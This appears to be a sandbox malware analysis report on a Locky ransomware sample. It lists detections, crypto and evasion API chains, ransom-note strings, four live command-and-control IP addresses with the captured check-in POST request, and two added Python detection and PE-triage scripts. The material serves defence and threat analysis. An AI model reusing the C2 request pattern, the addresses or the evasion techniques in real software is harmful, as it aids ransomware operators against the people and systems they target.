Windows Analysis Report
LockyRansom.exe

Overview

General Information

Sample name: LockyRansom.exe
Analysis ID: 1446225
MD5: 1720b1748ad7b8ac0bfc1c3636fead95
SHA1: 97bae63417df5bde4a05cd44c6c523db50f6ab76
SHA256: 3329641a171508fa6b1ad7674b31431093d46be190d1a51acd77e486f42d9c8e
Tags: exe, LockyRansomware

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
AI detected suspicious sample
Found evasive API chain (may stop execution after checking locale)
Found potential ransomware demand text
Machine Learning detection for sample
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: LockyRansom.exe Avira: detected
Source: LockyRansom.exe ReversingLabs: Detection: 95%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: LockyRansom.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00415310 GetLastError,__CxxThrowException@8,CryptAcquireContextA, 0_2_00415310
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, 0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00416170 CryptReleaseContext,CryptDestroyKey, 0_2_00416170
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_004193D8 CryptReleaseContext, 0_2_004193D8
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, 0_2_0041544C
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040F8D0 CryptReleaseContext, 0_2_0040F8D0
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040F890 CryptReleaseContext, 0_2_0040F890
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040F8B8 CryptReleaseContext, 0_2_0040F8B8
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040F980 CryptGenRandom,__CxxThrowException@8,GetLastError, 0_2_0040F980
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040FB50 CryptDestroyKey, 0_2_0040FB50
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040FB10 CryptDestroyKey, 0_2_0040FB10
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040FBF0 __CxxThrowException@8,CryptEncrypt,GetLastError, 0_2_0040FBF0

Compliance

Source: C:\Users\user\Desktop\LockyRansom.exe Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack
Source: LockyRansom.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: gefas.pdb source: LockyRansom.exe
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0042D5D0 FindClose,FindFirstFileW, 0_2_0042D5D0

Networking

Source: Traffic Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49704 -> 185.179.190.31:80
Source: Traffic Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49705 -> 37.143.9.154:80
Source: Traffic Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49706 -> 46.17.44.153:80
Source: Traffic Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49708 -> 46.183.165.45:80
Source: Traffic Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49709 -> 185.179.190.31:80
Source: Traffic Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49710 -> 37.143.9.154:80
Source: Traffic Snort IDS: 2023577 ET TROJAN Locky CnC Checkin HTTP Pattern 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic Snort IDS: 2023552 ET TROJAN Locky CnC checkin Nov 21 M2 192.168.2.7:49711 -> 46.17.44.153:80
Source: Traffic Snort IDS: 2023551 ET TROJAN Locky CnC checkin Nov 21 192.168.2.7:49711 -> 46.17.44.153:80
Source: Joe Sandbox View ASN Name: ASBAXETRU
Source: Joe Sandbox View ASN Name: AS-REGRU
Source: Joe Sandbox View ASN Name: IHCRUInternet-HostingLtdMoscowRussiaRU
Source: Joe Sandbox View ASN Name: WEBHOST1-ASRU
Source: global traffic HTTP traffic detected: seven POST check-ins with an identical header set, two each to 185.179.190.31, 37.143.9.154 and 46.17.44.153 and one to 46.183.165.45 (only the Referer and Host values change between them); the first, to 185.179.190.31, is:
  POST /imageload.cgi HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  Referer: http://185.179.190.31/
  x-requested-with: XMLHttpRequest
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  Cache-Control: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.179.190.31
  Content-Length: 613
  Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query (48 connections to four addresses contacted as IP literals, so no DNS lookup precedes them): 185.179.190.31 (12), 37.143.9.154 (20), 46.17.44.153 (10), 46.183.165.45 (6)
Source: unknown HTTP traffic detected: POST check-in to 185.179.190.31 with the following headers:
  POST /imageload.cgi HTTP/1.1
  Accept: */*
  Accept-Language: en-us
  Referer: http://185.179.190.31/
  x-requested-with: XMLHttpRequest
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  Cache-Control: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.179.190.31
  Content-Length: 613
  Connection: Keep-Alive
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.179.190.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.179.190.31/imageload.cgin
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.179.190.31/imageload.cgir
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imag=
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imageload.cgiC
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imageload.cgid
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imageload.cgilh
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://37.143.9.154/imageload.cgiy
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgi0
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgi0.31/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgiL
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgiP
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgiV
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgii
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgik
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.153/imageload.cgiy3
Source: LockyRansom.exe, 00000000.00000002.2442409381.00000000005F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.17.44.1531oad.cgi%880
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.183.165.45/
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.183.165.45/imageload.cgi
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://46.183.165.45/imageload.cgia-deddda976288
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.torproject.org/download/download-easy.html
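The check-in traffic above has a fixed shape: a POST to /imageload.cgi, the same MSIE 7.0/Trident user agent on every request, an x-requested-with: XMLHttpRequest header on a form-encoded body, and Host and Referer set to a public IP literal that was never resolved through DNS. Those traits can be turned into a proxy-log or pcap-side detector. The script below is an added example written for this page, not Joe Sandbox or Emerging Threats code. The three request strings are constructed: the first is modelled on the captured POST, the other two are benign look-alikes that each share one trait with it. The verdict threshold (three traits) is the author's assumption.

```python
import ipaddress

# Indicators taken from the captured check-ins in this report.
LOCKY_PATH = "/imageload.cgi"
LOCKY_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; "
            ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")

# Constructed sample requests (not the report's pcap): the first mirrors the
# observed Locky POST, the other two are benign look-alikes.
SAMPLE_REQUESTS = [
    "POST /imageload.cgi HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "Referer: http://185.179.190.31/\r\n"
    "x-requested-with: XMLHttpRequest\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Cache-Control: no-cache\r\n"
    f"User-Agent: {LOCKY_UA}\r\n"
    "Host: 185.179.190.31\r\n"
    "Content-Length: 613\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    # Same path name, but a GET to a DNS name from a current browser.
    "GET /imageload.cgi?id=7 HTTP/1.1\r\n"
    "Host: images.example.com\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/124.0\r\n\r\n",
    # POST to an IP literal, but a private intranet host and a JSON API client.
    "POST /api/upload HTTP/1.1\r\n"
    "Host: 10.0.0.5\r\n"
    "Content-Type: application/json\r\n"
    "User-Agent: curl/8.5.0\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def host_ip(host):
    """Return an ip_address when the Host header is an IP literal, else None."""
    try:
        return ipaddress.ip_address(host.rsplit(":", 1)[0])
    except ValueError:
        return None


def locky_indicators(raw):
    """List the Locky check-in traits present in one request."""
    method, path, h = parse_request(raw)
    host = h.get("host", "")
    ip = host_ip(host)
    hits = []
    if method == "POST" and path == LOCKY_PATH:
        hits.append("POST to /imageload.cgi")
    if h.get("user-agent") == LOCKY_UA:
        hits.append("fixed MSIE 7.0/Trident user agent")
    if ip is not None and ip.is_global:
        hits.append("Host is a public IP literal (no DNS lookup)")
    if (h.get("x-requested-with") == "XMLHttpRequest"
            and h.get("content-type") == "application/x-www-form-urlencoded"):
        hits.append("XMLHttpRequest form POST with no page context")
    if h.get("referer", "").rstrip("/") == f"http://{host}":
        hits.append("Referer is the C2 root itself")
    return hits


def classify(raw, threshold=3):
    """Assumed policy: three or more traits is a Locky check-in, fewer is suspicious."""
    hits = locky_indicators(raw)
    if len(hits) >= threshold:
        return "locky_c2_checkin", hits
    return ("suspicious" if hits else "benign"), hits


def c2_addresses(requests):
    """Host values of every request classified as a Locky check-in (the IOC list)."""
    iocs = set()
    for raw in requests:
        verdict, _ = classify(raw)
        if verdict == "locky_c2_checkin":
            iocs.add(parse_request(raw)[2]["host"])
    return iocs


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        verdict, hits = classify(raw)
        print(parse_request(raw)[2].get("host"), verdict, hits)
    print("C2 IOCs:", sorted(c2_addresses(SAMPLE_REQUESTS)))
```

The bare-IP check is the trait that survives a user-agent or path change by the operators: the four addresses in this report were all contacted without a preceding DNS query, which is why the sandbox lists them under "TCP traffic detected without corresponding DNS query". Scoring it together with the header oddities keeps an intranet POST to 10.0.0.5 from firing.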

Spam, unwanted Advertisements and Ransom Demands

Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: All of your files are encrypted with RSA-2048 and AES-128 ciphers.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Decrypting of your files is only possible with the private key and decrypt program, which is on our secret server.
Source: LockyRansom.exe, 00000000.00000002.2442361134.00000000005E1000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: To receive your private key follow one of the links:
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00415410 GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, 0_2_00415410
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0041544C GetLastError,__CxxThrowException@8,CryptDestroyKey,CryptImportKey, 0_2_0041544C
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_004022D0 0_2_004022D0
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040A58C 0_2_0040A58C
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_004029C0 0_2_004029C0
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040B2C4 0_2_0040B2C4
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040940E 0_2_0040940E
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040995F 0_2_0040995F
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00409EB0 0_2_00409EB0
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: String function: 004182C0 appears 33 times
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: String function: 004761A0 appears 36 times
Source: LockyRansom.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal96.rans.evad.winEXE@1/0@0/4
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040CC4E CoCreateInstance, 0_2_0040CC4E
Source: C:\Users\user\Desktop\LockyRansom.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LockyRansom.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: cryptdll.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: mciwave.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: gfiwave.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: dsrole.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\LockyRansom.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: LockyRansom.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: gefas.pdb source: LockyRansom.exe

Data Obfuscation

Source: C:\Users\user\Desktop\LockyRansom.exe Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack .text:ER;.rdata:EW;.dec:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;.cdata:R;
Source: C:\Users\user\Desktop\LockyRansom.exe Unpacked PE file: 0.2.LockyRansom.exe.400000.0.unpack
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004079B0
Source: LockyRansom.exe Static PE information: section name: .dec
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00404705 push ecx; ret 0_2_00404718
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_004029AB push ecx; ret 0_2_004029BB
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00401408 push eax; ret 0_2_00401426
Source: LockyRansom.exe Static PE information: section name: .rdata entropy: 7.910838175775477
Source: C:\Users\user\Desktop\LockyRansom.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 times)
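The three static findings above (a section named .dec, .rdata at entropy 7.91, and .rdata becoming executable and writable once the sample unpacks itself in place) are exactly what a pre-detonation triage script should surface. The script below is an added example written for this page, not Joe Sandbox's own logic. It builds a minimal PE32 image in memory whose section names and rights are modelled on the rights string in the report, parses the section table with struct (no pefile dependency), and flags the same three conditions. The entropy threshold of 7.5 and the allow-list of "standard" section names are the author's assumptions; the random bytes in the sample .rdata stand in for the encrypted payload and are not taken from LockyRansom.exe.

```python
import math
import random
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}  # assumed allow-list
ENTROPY_THRESHOLD = 7.5   # assumed; 8.0 is the maximum for byte data


def shannon_entropy(data):
    """Bits per byte; compressed or encrypted data sits close to 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def rights(chars):
    """Render section characteristics the way the report does (E/R/W)."""
    return "".join(r for r, bit in (("E", IMAGE_SCN_MEM_EXECUTE), ("R", IMAGE_SCN_MEM_READ),
                                    ("W", IMAGE_SCN_MEM_WRITE)) if chars & bit)


def build_sample_pe(sections, align=0x200):
    """Constructed PE32 image: DOS header, PE signature, COFF header, 224-byte
    optional header, then one section per (name, characteristics, raw bytes)."""
    opt_size = 224
    hdr_len = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // align) * align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<II", opt, 32, 0x1000, align)      # SectionAlignment, FileAlignment
    table, body, raw_ptr, va = bytearray(), bytearray(), hdr_len, 0x1000
    for name, chars, raw in sections:
        raw_size = -(-len(raw) // align) * align
        table += struct.pack(SECTION_HDR, name.encode(), len(raw), va, raw_size,
                             raw_ptr, 0, 0, 0, 0, chars)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += -(-len(raw) // 0x1000) * 0x1000 or 0x1000
    headers = (dos + b"PE\0\0" + coff + opt + table).ljust(hdr_len, b"\0")
    return bytes(headers + body)


def parse_sections(image):
    """Walk the section table; entropy is computed over SizeOfRawData bytes on disk."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    n_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    out = []
    for i in range(n_sections):
        f = struct.unpack_from(SECTION_HDR, image, table + 40 * i)
        name, raw_size, raw_ptr, chars = f[0], f[3], f[4], f[9]
        raw = image[raw_ptr:raw_ptr + raw_size]
        out.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "chars": chars,
                    "rights": rights(chars), "entropy": round(shannon_entropy(raw), 2)})
    return out


def triage(image):
    """Return (name, rights, entropy, flags) per section for the three report findings."""
    findings = []
    for s in parse_sections(image):
        flags = []
        if s["name"] not in STANDARD_SECTIONS:
            flags.append("non-standard section name")
        if s["entropy"] >= ENTROPY_THRESHOLD:
            flags.append("high entropy (packed/encrypted payload)")
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            flags.append("writable and executable (self-modifying code)")
        findings.append((s["name"], s["rights"], s["entropy"], flags))
    return findings


_rng = random.Random(1446225)   # seeded so the constructed sample is reproducible
SAMPLE_LAYOUT = [               # modelled on ".text:ER;.rdata:EW;.dec:W;.rsrc:R" in the report
    (".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\x55\x8b\xec" + b"\x90" * 600 + b"\xc3"),
    (".rdata", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE, bytes(_rng.getrandbits(8) for _ in range(4096))),
    (".dec", IMAGE_SCN_MEM_WRITE, b"\0" * 1024),
    (".rsrc", IMAGE_SCN_MEM_READ, b"VS_VERSION_INFO\0" * 32),
]
SAMPLE_IMAGE = build_sample_pe(SAMPLE_LAYOUT)

if __name__ == "__main__":
    for name, r, ent, flags in triage(SAMPLE_IMAGE):
        print(f"{name:8} {r:3} entropy={ent:.2f} {', '.join(flags) or 'ok'}")
```

Run against a real file, replace SAMPLE_IMAGE with open(path, "rb").read(). An .rdata section is normally read-only constants; seeing it at entropy near 8 and marked writable is the on-disk tell for the "overwrites its own PE header" and "changes PE section rights" behaviours the sandbox observed at runtime.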

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\LockyRansom.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0040C58C rdtsc 0_2_0040C58C
Source: C:\Users\user\Desktop\LockyRansom.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\Desktop\LockyRansom.exe API coverage: 7.7 %
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0042D5D0 FindClose,FindFirstFileW, 0_2_0042D5D0
Source: LockyRansom.exe, 00000000.00000002.2442694513.000000000078E000.00000004.00000020.00020000.00000000.sdmp, LockyRansom.exe, 00000000.00000002.2442694513.000000000073E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\LockyRansom.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_00405393 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00405393
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_004079B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004079B0
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_005C007E push dword ptr fs:[00000030h] 0_2_005C007E
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_005C03EE push dword ptr fs:[00000030h] 0_2_005C03EE
Source: C:\Users\user\Desktop\LockyRansom.exe Code function: 0_2_0069007E push dword ptr fs:[00000030h] 0_2_0069007E
